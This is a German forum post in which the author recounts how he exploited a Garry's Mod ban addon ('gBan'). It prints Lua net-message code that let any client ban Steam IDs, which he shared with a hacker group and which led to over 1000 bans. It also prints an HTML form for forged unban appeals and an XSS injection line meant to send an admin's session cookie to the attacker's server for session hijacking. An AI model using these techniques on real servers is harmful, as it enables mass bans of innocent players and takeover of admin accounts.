Hallo,
Mal wieder ich...
Ich wollte mal eine Geschichte erzählen, über ein ( in MEINEN Augen schlechtes Addon ).
Alles startete anfangs 2016 auf dem Instinkt Server. Der kleine C0e (mein alter name ableitung von c0re ) spielte gerade mit seinem neusten hack "Excellent v1.0". Mit diesem er das erste mal
CAC anticheat bypassen konnte. Nun da er ein Starken hack (für die damalige zeit ) hatte dachte er sich "hmm was kann ich jetzt tun" nun er hatte scripthook laufen und schaute sich die client scripts des Server an.
Nun kam es dazu das er die zeile aller zeilen fand:
net.Start( "gBan.BanBuffer" )
net.WriteBool( true )
net.WriteInt( time , 32 )
net.WriteString( reson )
net.WriteString( id )
net.SendToServer()
Dies Zeilen sollten seine weitere Gmod Karriere verändern.
So kam es dazu das er dies in eine test Datei speicherte und dies dort vergessen hat.
Nach ein paar Wochen / Monaten fand er sie zufällig beim ausmisten alter Scripts wieder,
also joint er er dem Server und führte das Script aus, nun hatte er ausversehn ein Exploit gefunden,
mit dem er in der Lage war Spieler ( Steam ids ) zu bannen.
Nun C0e war damals dumm und hat diesen Exploit weiter gegeben in eine kleine deutsche Hacker Gruppe ( existiert nicht mehr )
zudem bastelte er sich ein random Steam ID generator und so kam es dazu das auf dem Instinkt Server 1000+ Gebannt wurden( ich habe das nie aktiv gemacht ).
Nun nach der zeit wurde ihm klar das es mehrer Server gab mit gban ( GruseGrotte , AKC-Gaming , Gold Phoenix ).
Nach einer Weile ( 2 monate ca ) wurde einer dieser Admins darauf aufmerksam und kontaktierte den Script-Ersteller.
Dieser Fixte den Exploit daraufhin.
Nun c0re wurde älter und benannte sich in K0e um ( hallo ) und dachte das Gban nun wieder sicher sei ? FALSCH 2016 / 2017
Durch zufall war er gerade im osh ( https://www.oldschoolhack.me/ ) irc und schrieb über das addon. Ein user ( ich nenne kein namen ) hilf mir dann
er zeigte mir wie xss funktioniert, so kam es dazu das wir eine Schwäche im System Fanden, welche es uns ermögtlichte für andere Leute ein Entbannantrag
zu stellen und über diese eine xss attacke auszuführen..
So What we done: zum erzeugen eines Entbannantrages
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Appeal</title>
</head>
<body>
<form role='form' action='secret link' method='post' enctype='multipart/form-data'>
steamName: <input type='text' name='steamName'/><br>
steamId: <input type='text' name='steamId' value='STEAM_0:1:000001337' /><br>
communityId: <input type='text' name='communityId' value='' /><br>
steamProfile: <input type='text' name='steamProfile' value=''/><br>
date: <input type='text' name='date' value='22-01-17 18:51'/><br>
reason: <input type='text' name='reason' value='RDM'/><br>
admin: <input type='text' name='admin' value='warriorgod' /><br>
unbanReason: <textarea name='unbanReason' rows='5' cols='10'></textarea><br>
<input name='submit' type='submit' value='Antrag einreichen'/>
</form>
</body>
</html>
Alles anzeigen
der xss code( not actual code
</textarea><script> script that send the cookies to my server and save it </script>
Wie das Web Interace Funktioniert:
Jeder Client logt sich über steam an dort bekommt er ein Cookie indem seine Session ID Gespiechert wird um ihn zu erkennen
Nun hatten wir jedoch den Session Key von der person der auf den Antrag, mit dem xss, geschaut hat.
Nun einfach mit einem Cookie Editor Mein Cookie mit dem der Admin Session ausgetuscht und bam ADMIN,
(dies wurde nie aktiv benutzt!!! hacken einer Webseite ist illegal dies wurde nur auf einem test Server mit Einverständnis des Owners getestet! )
K03